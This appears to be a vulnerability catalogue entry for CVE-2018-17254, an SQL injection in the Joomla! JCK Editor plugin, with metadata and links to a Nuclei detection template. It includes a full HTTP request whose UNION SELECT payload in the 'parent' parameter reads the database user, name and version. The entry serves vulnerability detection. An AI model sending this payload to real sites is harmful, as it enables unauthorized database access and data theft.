| Title | Joomla! JCK Editor SQL Injection |
|---|---|
| Author | Suman_Kar |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. |
| Remediation | Update or remove the affected plugin. |
| CVSS Score | 9.8 |
| EPSS Score | 0.89425 |
| CVE ID | CVE-2018-17254 |
| CWE ID | CWE-89 |
| Tags | cve cve2018 packetstorm edb joomla sqli arkextensions joomla\! vkev vuln |
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(8513)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Connection: close
Referer: http://www.victim.com
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-17254.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-17254.pcap
N/AN/A